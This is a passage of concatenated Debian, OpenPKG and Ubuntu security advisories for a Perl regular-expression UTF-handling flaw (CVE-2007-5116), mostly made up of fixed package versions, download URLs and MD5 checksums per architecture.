      Size/MD5 checksum:     1010 101f7c5357740b63a670ae874a3a498a
    http://security.debian.org/pool/updates/main/p/perl/perl_5.8.8-7etch1_amd64.deb
      Size/MD5 checksum:  4238220 a2a9c0db784cc91e249f23e5564207bd
    http://security.debian.org/pool/updates/main/p/perl/perl-base_5.8.8-7etch1_amd64.deb
      Size/MD5 checksum:   808804 469c3fd8e358d917225dd49f987bbf8d
    http://security.debian.org/pool/updates/main/p/perl/perl-debug_5.8.8-7etch1_amd64.deb
      Size/MD5 checksum:  2734912 d34da61c02d263e230b55f911d2dc748
    http://security.debian.org/pool/updates/main/p/perl/perl-suid_5.8.8-7etch1_amd64.deb
      Size/MD5 checksum:    32798 afac9013d139c7ab1276f50cc35f4512
    

    ARM architecture:

    http://security.debian.org/pool/updates/main/p/perl/libperl-dev_5.8.8-7etch1_arm.deb
      Size/MD5 checksum:   561934 9739f475931e29fb26e23873df727e04
    http://security.debian.org/pool/updates/main/p/perl/libperl5.8_5.8.8-7etch1_arm.deb
      Size/MD5 checksum:     1018 77926e3d601fe1ed9bd75ef5a854d4e4
    http://security.debian.org/pool/updates/main/p/perl/perl_5.8.8-7etch1_arm.deb
      Size/MD5 checksum:  3412144 73c5f41073926ea641d06032b0c5d228
    http://security.debian.org/pool/updates/main/p/perl/perl-base_5.8.8-7etch1_arm.deb
      Size/MD5 checksum:   760246 574a68af0f13bc1a80d97c0eaa9ca4fc
    http://security.debian.org/pool/updates/main/p/perl/perl-debug_5.8.8-7etch1_arm.deb
      Size/MD5 checksum:  2545942 7fb21c951bfd70b24e9b63a4025059f4
    http://security.debian.org/pool/updates/main/p/perl/perl-suid_5.8.8-7etch1_arm.deb
      Size/MD5 checksum:    30358 ed5a223824e775a2e37b8e492e25abcb
    

    HP Precision architecture:

    http://security.debian.org/pool/updates/main/p/perl/libperl-dev_5.8.8-7etch1_hppa.deb
      Size/MD5 checksum:   693944 441ce7894fc9d46c3a285b8681097a24
    http://security.debian.org/pool/updates/main/p/perl/libperl5.8_5.8.8-7etch1_hppa.deb
      Size/MD5 checksum:     1014 068b7030ce2e74328a567f560690e208
    http://security.debian.org/pool/updates/main/p/perl/perl_5.8.8-7etch1_hppa.deb
      Size/MD5 checksum:  4192184 916514f48c2d5ab511aac0c9d878d133
    http://security.debian.org/pool/updates/main/p/perl/perl-base_5.8.8-7etch1_hppa.deb
      Size/MD5 checksum:   868288 7eb4c3e38c25285bc6a0ab6dc5a1d770
    http://security.debian.org/pool/updates/main/p/perl/perl-debug_5.8.8-7etch1_hppa.deb
      Size/MD5 checksum:  2735540 ff004f914a26621775d0247834e78cae
    http://security.debian.org/pool/updates/main/p/perl/perl-suid_5.8.8-7etch1_hppa.deb
      Size/MD5 checksum:    33210 c035eeb23dc4a1e04444065ae75f7b24
    

    Intel IA-32 architecture:

    http://security.debian.org/pool/updates/main/p/perl/libperl-dev_5.8.8-7etch1_i386.deb
      Size/MD5 checksum:   585382 a27a344126f78b50c6874887ba8a7dec
    http://security.debian.org/pool/updates/main/p/perl/libperl5.8_5.8.8-7etch1_i386.deb
      Size/MD5 checksum:   526956 2ae05903f4a08189e5319c4ca869828a
    http://security.debian.org/pool/updates/main/p/perl/perl_5.8.8-7etch1_i386.deb
      Size/MD5 checksum:  3578468 e6a886c21a58d96083d0385ef602df75
    http://security.debian.org/pool/updates/main/p/perl/perl-base_5.8.8-7etch1_i386.deb
      Size/MD5 checksum:   762180 e7d2c75b547db6c71e77395461c62e82
    http://security.debian.org/pool/updates/main/p/perl/perl-debug_5.8.8-7etch1_i386.deb
      Size/MD5 checksum:  2491880 f01678cc32a118929a22ee765ccd4768
    http://security.debian.org/pool/updates/main/p/perl/perl-suid_5.8.8-7etch1_i386.deb
      Size/MD5 checksum:    32094 56c5c6dded2172596d6bbea68d94068e
    

    Intel IA-64 architecture:

    http://security.debian.org/pool/updates/main/p/perl/libperl-dev_5.8.8-7etch1_ia64.deb
      Size/MD5 checksum:   977484 94fd1bb72f48559786abedc8b0ea6107
    http://security.debian.org/pool/updates/main/p/perl/libperl5.8_5.8.8-7etch1_ia64.deb
      Size/MD5 checksum:     1006 9272b8f38e0b68c7143401bbe0dd10b3
    http://security.debian.org/pool/updates/main/p/perl/perl_5.8.8-7etch1_ia64.deb
      Size/MD5 checksum:  4335608 4caae66d357b7c8f6a9d3b6ec1b98ac1
    http://security.debian.org/pool/updates/main/p/perl/perl-base_5.8.8-7etch1_ia64.deb
      Size/MD5 checksum:  1153272 e61d597589339745c714ada2fa54d397
    http://security.debian.org/pool/updates/main/p/perl/perl-debug_5.8.8-7etch1_ia64.deb
      Size/MD5 checksum:  3364174 d31a368b96392b89af59fbb529c81d20
    http://security.debian.org/pool/updates/main/p/perl/perl-suid_5.8.8-7etch1_ia64.deb
      Size/MD5 checksum:    51270 84b6fde3b7ed1898b59267b994efb4ff
    

    Little endian MIPS architecture:

    http://security.debian.org/pool/updates/main/p/perl/libperl-dev_5.8.8-7etch1_mipsel.deb
      Size/MD5 checksum:   687114 8973b906567dd752c73039a89dcb14ee
    http://security.debian.org/pool/updates/main/p/perl/libperl5.8_5.8.8-7etch1_mipsel.deb
      Size/MD5 checksum:     1012 47029166d1e495ad05a251d4946fbdc2
    http://security.debian.org/pool/updates/main/p/perl/perl_5.8.8-7etch1_mipsel.deb
      Size/MD5 checksum:  3413386 5ff0e279c6934b01d4bf163a5b171584
    http://security.debian.org/pool/updates/main/p/perl/perl-base_5.8.8-7etch1_mipsel.deb
      Size/MD5 checksum:   784352 dece00126cd1cf8c07ec673bd8043e6d
    http://security.debian.org/pool/updates/main/p/perl/perl-debug_5.8.8-7etch1_mipsel.deb
      Size/MD5 checksum:  2729528 194373b4343008cc33b345744b7935fa
    http://security.debian.org/pool/updates/main/p/perl/perl-suid_5.8.8-7etch1_mipsel.deb
      Size/MD5 checksum:    32336 98092e70a5ea30153ec32f1d87cde1e4
    

    PowerPC architecture:

    http://security.debian.org/pool/updates/main/p/perl/libperl-dev_5.8.8-7etch1_powerpc.deb
      Size/MD5 checksum:   653158 7b39e1fb1a940e19ebe4e9df9f6c1abb
    http://security.debian.org/pool/updates/main/p/perl/libperl5.8_5.8.8-7etch1_powerpc.deb
      Size/MD5 checksum:     1010 4f68cd00058bfe50e5353cc2f1027e30
    http://security.debian.org/pool/updates/main/p/perl/perl_5.8.8-7etch1_powerpc.deb
      Size/MD5 checksum:  3824518 514b283d68bdb8ab5f8211b86fba6dd7
    http://security.debian.org/pool/updates/main/p/perl/perl-base_5.8.8-7etch1_powerpc.deb
      Size/MD5 checksum:   810514 54511356fc749a7518d6339d4832ab3e
    http://security.debian.org/pool/updates/main/p/perl/perl-debug_5.8.8-7etch1_powerpc.deb
      Size/MD5 checksum:  2709230 f62606ee2641c529eed8d6f2aff8489e
    http://security.debian.org/pool/updates/main/p/perl/perl-suid_5.8.8-7etch1_powerpc.deb
      Size/MD5 checksum:    32902 de438d275e8c95f5dba5096386f3bdbd
    

    Sun Sparc architecture:

    http://security.debian.org/pool/updates/main/p/perl/libperl-dev_5.8.8-7etch1_sparc.deb
      Size/MD5 checksum:   594254 32f78d47a9fdb90ac99363642330cea5
    http://security.debian.org/pool/updates/main/p/perl/libperl5.8_5.8.8-7etch1_sparc.deb
      Size/MD5 checksum:     1012 b4cdde1e439f59c484701a503271f3ba
    http://security.debian.org/pool/updates/main/p/perl/perl_5.8.8-7etch1_sparc.deb
      Size/MD5 checksum:  3796708 d85383c57b38d1da74f5d4fed6e33c02
    http://security.debian.org/pool/updates/main/p/perl/perl-base_5.8.8-7etch1_sparc.deb
      Size/MD5 checksum:   783042 675e8693a697b670936108a3baeded7f
    http://security.debian.org/pool/updates/main/p/perl/perl-debug_5.8.8-7etch1_sparc.deb
      Size/MD5 checksum:  2565704 7419d49d4b7ac54b849d432177a3ff36
    http://security.debian.org/pool/updates/main/p/perl/perl-suid_5.8.8-7etch1_sparc.deb
      Size/MD5 checksum:    31072 40d9e6abb0fd11019912c4877c8bf3ac
    

    These files will probably be moved into the stable distribution on its next update.

    References: [0] http://www.perl.com/


    Primary Package Name: perl Primary Package Home: http://openpkg.org/go/package/perl

    Corrected Distribution: Corrected Branch: Corrected Package: OpenPKG Community CURRENT perl-5.8.8-20071108


    For security reasons, this document was digitally signed with the OpenPGP public key of the OpenPKG GmbH (public key id 61B7AE34) which you can download from http://openpkg.com/openpkg.com.pgp or retrieve from the OpenPGP keyserver at hkp://pgp.openpkg.org/. Follow the instructions at http://openpkg.com/security/signatures/ for more details on how to verify the integrity of this document. =========================================================== Ubuntu Security Notice USN-552-1 December 04, 2007 perl vulnerability CVE-2007-5116 ===========================================================

    A security issue affects the following Ubuntu releases:

    Ubuntu 6.06 LTS Ubuntu 6.10 Ubuntu 7.04 Ubuntu 7.10

    This advisory also applies to the corresponding versions of Kubuntu, Edubuntu, and Xubuntu.

    The problem can be corrected by upgrading your system to the following package versions:

    Ubuntu 6.06 LTS: libperl5.8 5.8.7-10ubuntu1.1

    Ubuntu 6.10: libperl5.8 5.8.8-6ubuntu0.1

    Ubuntu 7.04: libperl5.8 5.8.8-7ubuntu0.1

    Ubuntu 7.10: libperl5.8 5.8.8-7ubuntu3.1

    In general, a standard system upgrade is sufficient to effect the necessary changes.

    Details follow:

    It was discovered that Perl's regular expression library did not correctly handle certain UTF sequences.

    Updated packages for Ubuntu 6.06 LTS:

    Source archives:

    http://security.ubuntu.com/ubuntu/pool/main/p/perl/perl_5.8.7-10ubuntu1.1.diff.gz
      Size/MD5:   165472 98da6197bbc7b042806866f19809a8b5
    http://security.ubuntu.com/ubuntu/pool/main/p/perl/perl_5.8.7-10ubuntu1.1.dsc
      Size/MD5:      737 a90e131231bab24114d318e852fbc451
    http://security.ubuntu.com/ubuntu/pool/main/p/perl/perl_5.8.7.orig.tar.gz
      Size/MD5: 12512211 dacefa1fe3c5b6d7bbc334ad94826131
    

    Architecture independent packages:

    http://security.ubuntu.com/ubuntu/pool/main/p/perl/perl-doc_5.8.7-10ubuntu1.1_all.deb
      Size/MD5:  7207544 8a96f50ff5738a2fafd7beb74a02f435
    http://security.ubuntu.com/ubuntu/pool/main/p/perl/perl-modules_5.8.7-10ubuntu1.1_all.deb
      Size/MD5:  2325742 021c622fda16904921dfcf02a6aa96c4
    http://security.ubuntu.com/ubuntu/pool/universe/p/perl/libcgi-fast-perl_5.8.7-10ubuntu1.1_all.deb
      Size/MD5:    40008 bd31ddd280da57be85e00c7c19d1f457
    

    amd64 architecture (Athlon64, Opteron, EM64T Xeon):

    http://security.ubuntu.com/ubuntu/pool/main/p/perl/libperl-dev_5.8.7-10ubuntu1.1_amd64.deb
      Size/MD5:   640850 9d0719b4779da8f93fedfb0eb654132b
    http://security.ubuntu.com/ubuntu/pool/main/p/perl/libperl5.8_5.8.7-10ubuntu1.1_amd64.deb
      Size/MD5:     1012 9c697f9e42f949736cf725e9c2774371
    http://security.ubuntu.com/ubuntu/pool/main/p/perl/perl-base_5.8.7-10ubuntu1.1_amd64.deb
      Size/MD5:   820628 080304d81ce38cc91246c8c2b7ee891f
    http://security.ubuntu.com/ubuntu/pool/main/p/perl/perl-suid_5.8.7-10ubuntu1.1_amd64.deb
      Size/MD5:    31478 dc27f9788ff01fd5097976ee75626e61
    http://security.ubuntu.com/ubuntu/pool/main/p/perl/perl_5.8.7-10ubuntu1.1_amd64.deb
      Size/MD5:  3978354 6d79ae2514a3ec9f152d0de125531192
    http://security.ubuntu.com/ubuntu/pool/universe/p/perl/perl-debug_5.8.7-10ubuntu1.1_amd64.deb
      Size/MD5:  2639400 2532bbf9f7ec861e7722d5cc1bef9836
    

    i386 architecture (x86 compatible Intel/AMD):

    http://security.ubuntu.com/ubuntu/pool/main/p/perl/libperl-dev_5.8.7-10ubuntu1.1_i386.deb
      Size/MD5:   559856 9ca996d88c16acb2a19eb6f80e3a68f4
    http://security.ubuntu.com/ubuntu/pool/main/p/perl/libperl5.8_5.8.7-10ubuntu1.1_i386.deb
      Size/MD5:   505890 501159b17800e56a2824b06aca598460
    http://security.ubuntu.com/ubuntu/pool/main/p/perl/perl-base_5.8.7-10ubuntu1.1_i386.deb
      Size/MD5:   737866 d3ca5af34f45f36979e644cb5e94cbb9
    http://security.ubuntu.com/ubuntu/pool/main/p/perl/perl-suid_5.8.7-10ubuntu1.1_i386.deb
      Size/MD5:    28974 c4eade3cf3be3b813bcbd7af7841b146
    http://security.ubuntu.com/ubuntu/pool/main/p/perl/perl_5.8.7-10ubuntu1.1_i386.deb
      Size/MD5:  3296740 7e67c35913fd8046a75434e401130497
    http://security.ubuntu.com/ubuntu/pool/universe/p/perl/perl-debug_5.8.7-10ubuntu1.1_i386.deb
      Size/MD5:  2404442 0138415fc08635142fb0985f30997655
    

    powerpc architecture (Apple Macintosh G3/G4/G5):

    http://security.ubuntu.com/ubuntu/pool/main/p/perl/libperl-dev_5.8.7-10ubuntu1.1_powerpc.deb
      Size/MD5:   656338 6201cd747c040ba44701ed056c9760c0
    http://security.ubuntu.com/ubuntu/pool/main/p/perl/libperl5.8_5.8.7-10ubuntu1.1_powerpc.deb
      Size/MD5:     1014 fecb67e1721ab983e3fb1a69eb610672
    http://security.ubuntu.com/ubuntu/pool/main/p/perl/perl-base_5.8.7-10ubuntu1.1_powerpc.deb
      Size/MD5:   815514 2799cd895e4681ed7f194039368e1dae
    http://security.ubuntu.com/ubuntu/pool/main/p/perl/perl-suid_5.8.7-10ubuntu1.1_powerpc.deb
      Size/MD5:    32042 808c4cdcc9db259a87224bbe75394c96
    http://security.ubuntu.com/ubuntu/pool/main/p/perl/perl_5.8.7-10ubuntu1.1_powerpc.deb
      Size/MD5:  3656072 73cdf23c1e5fbda52f4936bb6d52fc9a
    http://security.ubuntu.com/ubuntu/pool/universe/p/perl/perl-debug_5.8.7-10ubuntu1.1_powerpc.deb
      Size/MD5:  2594308 f6585376f877b9838bb62bd09002de49
    

    sparc architecture (Sun SPARC/UltraSPARC):

    http://security.ubuntu.com/ubuntu/pool/main/p/perl/libperl-dev_5.8.7-10ubuntu1.1_sparc.deb
      Size/MD5:   599300 d4011b7ac37b77c53901f676a623cd0f
    http://security.ubuntu.com/ubuntu/pool/main/p/perl/libperl5.8_5.8.7-10ubuntu1.1_sparc.deb
      Size/MD5:     1008 caf72f034baf309d4a9269d45148325d
    http://security.ubuntu.com/ubuntu/pool/main/p/perl/perl-base_5.8.7-10ubuntu1.1_sparc.deb
      Size/MD5:   790400 23a9e4c89ad2fe168ccc2391a89e463d
    http://security.ubuntu.com/ubuntu/pool/main/p/perl/perl-suid_5.8.7-10ubuntu1.1_sparc.deb
      Size/MD5:    30114 a53a3f41de69344ec741d46220e3ad7e
    http://security.ubuntu.com/ubuntu/pool/main/p/perl/perl_5.8.7-10ubuntu1.1_sparc.deb
      Size/MD5:  3581290 7be78922d29146a99fb5a3f7dec3790e
    http://security.ubuntu.com/ubuntu/pool/universe/p/perl/perl-debug_5.8.7-10ubuntu1.1_sparc.deb
      Size/MD5:  2485596 02c9351609686d699573508e64fa2db0
    

    Updated packages for Ubuntu 6.10:

    Source archives:

    http://security.ubuntu.com/ubuntu/pool/main/p/perl/perl_5.8.8-6ubuntu0.1.diff.gz
      Size/MD5:    88034 e7b46f9bc884e567164e379ab26e9650
    http://security.ubuntu.com/ubuntu/pool/main/p/perl/perl_5.8.8-6ubuntu0.1.dsc
      Size/MD5:      749 910ebb281f9ea452ae0857c8314d1cfd
    http://security.ubuntu.com/ubuntu/pool/main/p/perl/perl_5.8.8.orig.tar.gz
      Size/MD5: 12829188 b8c118d4360846829beb30b02a6b91a7
    

    Architecture independent packages:

    http://security.ubuntu.com/ubuntu/pool/main/p/perl/perl-doc_5.8.8-6ubuntu0.1_all.deb
      Size/MD5:  7352010 b99926050f3b94b3e48860f70f740aa3
    http://security.ubuntu.com/ubuntu/pool/main/p/perl/perl-modules_5.8.8-6ubuntu0.1_all.deb
      Size/MD5:  2309166 9d0fd2d1e39918d3dc0b1aab4c94fef1
    http://security.ubuntu.com/ubuntu/pool/universe/p/perl/libcgi-fast-perl_5.8.8-6ubuntu0.1_all.deb
      Size/MD5:    40398 22b82469393909ff8696fb66c5cd3a53
    

    amd64 architecture (Athlon64, Opteron, EM64T Xeon):

    http://security.ubuntu.com/ubuntu/pool/main/p/perl/libperl-dev_5.8.8-6ubuntu0.1_amd64.deb
      Size/MD5:   633844 d731f8b5c5e72a8f901b8e5f1ff9c969
    http://security.ubuntu.com/ubuntu/pool/main/p/perl/libperl5.8_5.8.8-6ubuntu0.1_amd64.deb
      Size/MD5:     1060 3f823954c678b8ec7cdbfa162769c5a2
    http://security.ubuntu.com/ubuntu/pool/main/p/perl/perl-base_5.8.8-6ubuntu0.1_amd64.deb
      Size/MD5:   809976 4b9d37a405a280fecd1f66de779bb3ff
    http://security.ubuntu.com/ubuntu/pool/main/p/perl/perl-debug_5.8.8-6ubuntu0.1_amd64.deb
      Size/MD5:  2740032 0f8417f96f652753f1ba80248cf00b22
    http://security.ubuntu.com/ubuntu/pool/main/p/perl/perl-suid_5.8.8-6ubuntu0.1_amd64.deb
      Size/MD5:    33032 2f89afbc96c250918bc1ca19d91e1adb
    http://security.ubuntu.com/ubuntu/pool/main/p/perl/perl_5.8.8-6ubuntu0.1_amd64.deb
      Size/MD5:  4047288 5732ea8ac056e8b84eae8aacff85e39f
    

    i386 architecture (x86 compatible Intel/AMD):

    http://security.ubuntu.com/ubuntu/pool/main/p/perl/libperl-dev_5.8.8-6ubuntu0.1_i386.deb
      Size/MD5:   576166 39f1f4597d70b448edabcf55ae025d31
    http://security.ubuntu.com/ubuntu/pool/main/p/perl/libperl5.8_5.8.8-6ubuntu0.1_i386.deb
      Size/MD5:   521498 35f0badd87f6ea95677671a923c0bd9b
    http://security.ubuntu.com/ubuntu/pool/main/p/perl/perl-base_5.8.8-6ubuntu0.1_i386.deb
      Size/MD5:   751416 fec47b71b9705f139a119e758522650c
    http://security.ubuntu.com/ubuntu/pool/main/p/perl/perl-debug_5.8.8-6ubuntu0.1_i386.deb
      Size/MD5:  2507638 631968cae57f3b647ee7a2cbf6c1c326
    http://security.ubuntu.com/ubuntu/pool/main/p/perl/perl-suid_5.8.8-6ubuntu0.1_i386.deb
      Size/MD5:    31446 697584fbffbdb407f414688b5e65de2e
    http://security.ubuntu.com/ubuntu/pool/main/p/perl/perl_5.8.8-6ubuntu0.1_i386.deb
      Size/MD5:  3375590 d60160cc0c6f0f02d7001c2b5b6c0eda
    

    powerpc architecture (Apple Macintosh G3/G4/G5):

    http://security.ubuntu.com/ubuntu/pool/main/p/perl/libperl-dev_5.8.8-6ubuntu0.1_powerpc.deb
      Size/MD5:   655630 54ed7f131777c37840a07d45449abbed
    http://security.ubuntu.com/ubuntu/pool/main/p/perl/libperl5.8_5.8.8-6ubuntu0.1_powerpc.deb
      Size/MD5:     1058 c7d4ed077dc5f47813cf9651832c4139
    http://security.ubuntu.com/ubuntu/pool/main/p/perl/perl-base_5.8.8-6ubuntu0.1_powerpc.deb
      Size/MD5:   811264 dbfa0db2d5addbef8999a7ca635f76c9
    http://security.ubuntu.com/ubuntu/pool/main/p/perl/perl-debug_5.8.8-6ubuntu0.1_powerpc.deb
      Size/MD5:  2704838 d58cadf730c133612a2b715a6d1ba76b
    http://security.ubuntu.com/ubuntu/pool/main/p/perl/perl-suid_5.8.8-6ubuntu0.1_powerpc.deb
      Size/MD5:    33034 cb872bf5e3e82f2fadd68531744fce74
    http://security.ubuntu.com/ubuntu/pool/main/p/perl/perl_5.8.8-6ubuntu0.1_powerpc.deb
      Size/MD5:  3734780 89ad67a21fad9c6ad706ef4528ab244b
    

    sparc architecture (Sun SPARC/UltraSPARC):

    http://security.ubuntu.com/ubuntu/pool/main/p/perl/libperl-dev_5.8.8-6ubuntu0.1_sparc.deb
      Size/MD5:   596308 ba0fd9953be95186e73fc0182e8bc638
    http://security.ubuntu.com/ubuntu/pool/main/p/perl/libperl5.8_5.8.8-6ubuntu0.1_sparc.deb
      Size/MD5:     1058 249e2f0416e9dda9b89b200fc0307abf
    http://security.ubuntu.com/ubuntu/pool/main/p/perl/perl-base_5.8.8-6ubuntu0.1_sparc.deb
      Size/MD5:   785358 57c0b81325a4178a03c5459f3764892c
    http://security.ubuntu.com/ubuntu/pool/main/p/perl/perl-debug_5.8.8-6ubuntu0.1_sparc.deb
      Size/MD5:  2580646 a6bc6816614b1498813f73c64f6fcee5
    http://security.ubuntu.com/ubuntu/pool/main/p/perl/perl-suid_5.8.8-6ubuntu0.1_sparc.deb
      Size/MD5:    31238 30dac6d5bc7e52ca86bf31b63d2b4bdc
    http://security.ubuntu.com/ubuntu/pool/main/p/perl/perl_5.8.8-6ubuntu0.1_sparc.deb
      Size/MD5:  3675336 12fa93853d4b4aec097c5bf94280fdb5
    

    Updated packages for Ubuntu 7.04:

    Source archives:

    http://security.ubuntu.com/ubuntu/pool/main/p/perl/perl_5.8.8-7ubuntu0.1.diff.gz
      Size/MD5:    93072 d7601147dea2f84164094cb5f465468f
    http://security.ubuntu.com/ubuntu/pool/main/p/perl/perl_5.8.8-7ubuntu0.1.dsc
      Size/MD5:      833 dc5eec23d30c9c2949d7f8db63853b1e
    http://security.ubuntu.com/ubuntu/pool/main/p/perl/perl_5.8.8.orig.tar.gz
      Size/MD5: 12829188 b8c118d4360846829beb30b02a6b91a7
    

    Architecture independent packages:

    http://security.ubuntu.com/ubuntu/pool/main/p/perl/perl-doc_5.8.8-7ubuntu0.1_all.deb
      Size/MD5:  7352222 e55e069d2f8000557b7b5b2aa0a1adcb
    http://security.ubuntu.com/ubuntu/pool/main/p/perl/perl-modules_5.8.8-7ubuntu0.1_all.deb
      Size/MD5:  2309560 dd6bed420c639b12e8d87e1e1c17761f
    http://security.ubuntu.com/ubuntu/pool/universe/p/perl/libcgi-fast-perl_5.8.8-7ubuntu0.1_all.deb
      Size/MD5:    40926 c175bc89fb6e7ab0a09b42a256dffc92
    

    amd64 architecture (Athlon64, Opteron, EM64T Xeon):

    http://security.ubuntu.com/ubuntu/pool/main/p/perl/libperl-dev_5.8.8-7ubuntu0.1_amd64.deb
      Size/MD5:   633990 6f659d15fd70053cadabb6eb4a62af97
    http://security.ubuntu.com/ubuntu/pool/main/p/perl/libperl5.8_5.8.8-7ubuntu0.1_amd64.deb
      Size/MD5:     1054 9bce50cfb434976acdf5fde560b20488
    http://security.ubuntu.com/ubuntu/pool/main/p/perl/perl-base_5.8.8-7ubuntu0.1_amd64.deb
      Size/MD5:   825078 097d8f4a1122478d3757e806ce87aa52
    http://security.ubuntu.com/ubuntu/pool/main/p/perl/perl-debug_5.8.8-7ubuntu0.1_amd64.deb
      Size/MD5:  2751476 6f3d9b0d94b648240948c67cda43f5ea
    http://security.ubuntu.com/ubuntu/pool/main/p/perl/perl-suid_5.8.8-7ubuntu0.1_amd64.deb
      Size/MD5:    33584 d9a3ef3ef1fe338c5d8d4b8becd90e54
    http://security.ubuntu.com/ubuntu/pool/main/p/perl/perl_5.8.8-7ubuntu0.1_amd64.deb
      Size/MD5:  4053672 6d4e46bffe916b65f60ad22646ffe04f
    

    i386 architecture (x86 compatible Intel/AMD):

    http://security.ubuntu.com/ubuntu/pool/main/p/perl/libperl-dev_5.8.8-7ubuntu0.1_i386.deb
      Size/MD5:   575736 4e8b9308d46c94245aa425d5d748310b
    http://security.ubuntu.com/ubuntu/pool/main/p/perl/libperl5.8_5.8.8-7ubuntu0.1_i386.deb
      Size/MD5:   533092 0e51d08b389b40e4de7ba387d1e84ec6
    http://security.ubuntu.com/ubuntu/pool/main/p/perl/perl-base_5.8.8-7ubuntu0.1_i386.deb
      Size/MD5:   764366 95193d01ace6a4e14a1def19b3f30545
    http://security.ubuntu.com/ubuntu/pool/main/p/perl/perl-debug_5.8.8-7ubuntu0.1_i386.deb
      Size/MD5:  2519080 f2d8e651e6a675a98f86f65646ce39e1
    http://security.ubuntu.com/ubuntu/pool/main/p/perl/perl-suid_5.8.8-7ubuntu0.1_i386.deb
      Size/MD5:    31944 8c6a5688d5f2aff2af6a3720f493a171
    http://security.ubuntu.com/ubuntu/pool/main/p/perl/perl_5.8.8-7ubuntu0.1_i386.deb
      Size/MD5:  3387948 69d6eaa7c204c6fe7f64b654cf152894
    

    powerpc architecture (Apple Macintosh G3/G4/G5):

    http://security.ubuntu.com/ubuntu/pool/main/p/perl/libperl-dev_5.8.8-7ubuntu0.1_powerpc.deb
      Size/MD5:   655158 5353abcd2b8cc6984e62af1560c23553
    http://security.ubuntu.com/ubuntu/pool/main/p/perl/libperl5.8_5.8.8-7ubuntu0.1_powerpc.deb
      Size/MD5:     1058 f4de2f8f93bc1b1b2b254165c145ee3b
    http://security.ubuntu.com/ubuntu/pool/main/p/perl/perl-base_5.8.8-7ubuntu0.1_powerpc.deb
      Size/MD5:   854058 a17efcd900e80cee096b1ad7d01b0f46
    http://security.ubuntu.com/ubuntu/pool/main/p/perl/perl-debug_5.8.8-7ubuntu0.1_powerpc.deb
      Size/MD5:  2721466 1412c01799559dd3d78e82c74a916996
    http://security.ubuntu.com/ubuntu/pool/main/p/perl/perl-suid_5.8.8-7ubuntu0.1_powerpc.deb
      Size/MD5:    37020 96638207a58488a7be3b5736020fa9fe
    http://security.ubuntu.com/ubuntu/pool/main/p/perl/perl_5.8.8-7ubuntu0.1_powerpc.deb
      Size/MD5:  3769700 da74c33814b0565f4f073b00cecea400
    

    sparc architecture (Sun SPARC/UltraSPARC):

    http://security.ubuntu.com/ubuntu/pool/main/p/perl/libperl-dev_5.8.8-7ubuntu0.1_sparc.deb
      Size/MD5:   596338 0cd6d0e9704cd7ee3b3dd9e33f9d3396
    http://security.ubuntu.com/ubuntu/pool/main/p/perl/libperl5.8_5.8.8-7ubuntu0.1_sparc.deb
      Size/MD5:     1058 84c48fa4edef5274c8d9d4c55fe3b52a
    http://security.ubuntu.com/ubuntu/pool/main/p/perl/perl-base_5.8.8-7ubuntu0.1_sparc.deb
      Size/MD5:   798438 69eb63699dea95c17df557ccd44564ca
    http://security.ubuntu.com/ubuntu/pool/main/p/perl/perl-debug_5.8.8-7ubuntu0.1_sparc.deb
      Size/MD5:  2592862 98850ef36922fa444fd0502afba43bd7
    http://security.ubuntu.com/ubuntu/pool/main/p/perl/perl-suid_5.8.8-7ubuntu0.1_sparc.deb
      Size/MD5:    33070 d22c4f74172c4adba2697abf5c73c68e
    http://security.ubuntu.com/ubuntu/pool/main/p/perl/perl_5.8.8-7ubuntu0.1_sparc.deb
      Size/MD5:  3682418 60c99f0e4ccc43f85c79938a96ee0455
    

    Updated packages for Ubuntu 7.10:

    Source archives:

    http://security.ubuntu.com/ubuntu/pool/main/p/perl/perl_5.8.8-7ubuntu3.1.diff.gz
      Size/MD5:    93377 1e4ec9cfc65220001f38e66bc4f56f9e
    http://security.ubuntu.com/ubuntu/pool/main/p/perl/perl_5.8.8-7ubuntu3.1.dsc
      Size/MD5:      833 4f3fbac268e294b885eae342164b3689
    http://security.ubuntu.com/ubuntu/pool/main/p/perl/perl_5.8.8.orig.tar.gz
      Size/MD5: 12829188 b8c118d4360846829beb30b02a6b91a7
    

    Architecture independent packages:

    http://security.ubuntu.com/ubuntu/pool/main/p/perl/perl-doc_5.8.8-7ubuntu3.1_all.deb
      Size/MD5:  7352108 e5eb23ee5b3aa0cdc9695a16d6806dce
    http://security.ubuntu.com/ubuntu/pool/main/p/perl/perl-modules_5.8.8-7ubuntu3.1_all.deb
      Size/MD5:  2309548 a3e19bb488e5abdd25bb6dbfcfc41f01
    http://security.ubuntu.com/ubuntu/pool/universe/p/perl/libcgi-fast-perl_5.8.8-7ubuntu3.1_all.deb
      Size/MD5:    41112 015a3cd3f858159ca6e8f59d9f24a4ea
    

    amd64 architecture (Athlon64, Opteron, EM64T Xeon):

    http://security.ubuntu.com/ubuntu/pool/main/p/perl/libperl-dev_5.8.8-7ubuntu3.1_amd64.deb
      Size/MD5:   636102 f074f93f1d6f20b5b4fd3a87681fcc6d
    http://security.ubuntu.com/ubuntu/pool/main/p/perl/libperl5.8_5.8.8-7ubuntu3.1_amd64.deb
      Size/MD5:     1058 a08f769b54183fa2e1ad5209df65b4fa
    http://security.ubuntu.com/ubuntu/pool/main/p/perl/perl-base_5.8.8-7ubuntu3.1_amd64.deb
      Size/MD5:   826274 dded240edee784d66b32d15a42e21420
    http://security.ubuntu.com/ubuntu/pool/main/p/perl/perl-debug_5.8.8-7ubuntu3.1_amd64.deb
      Size/MD5:  2758908 030cca99de6221176f6f1b30b2730761
    http://security.ubuntu.com/ubuntu/pool/main/p/perl/perl-suid_5.8.8-7ubuntu3.1_amd64.deb
      Size/MD5:    33638 0fb9c0f1f5a4ec9be1a8fa5b153f3a31
    http://security.ubuntu.com/ubuntu/pool/main/p/perl/perl_5.8.8-7ubuntu3.1_amd64.deb
      Size/MD5:  4054576 ed997ee6c2d500d6edc6cbc0044ce6be
    

    i386 architecture (x86 compatible Intel/AMD):

    http://security.ubuntu.com/ubuntu/pool/main/p/perl/libperl-dev_5.8.8-7ubuntu3.1_i386.deb
      Size/MD5:   576402 9a43f0153732f1c9da78dd888a679e08
    http://security.ubuntu.com/ubuntu/pool/main/p/perl/libperl5.8_5.8.8-7ubuntu3.1_i386.deb
      Size/MD5:   533380 1bb3c67a2d586ef3eaefb41be94ab729
    http://security.ubuntu.com/ubuntu/pool/main/p/perl/perl-base_5.8.8-7ubuntu3.1_i386.deb
      Size/MD5:   765194 3e7418191776393366a27650158850f8
    http://security.ubuntu.com/ubuntu/pool/main/p/perl/perl-debug_5.8.8-7ubuntu3.1_i386.deb
      Size/MD5:  2522478 f8720540f22cf8cf7f09b3456b327cae
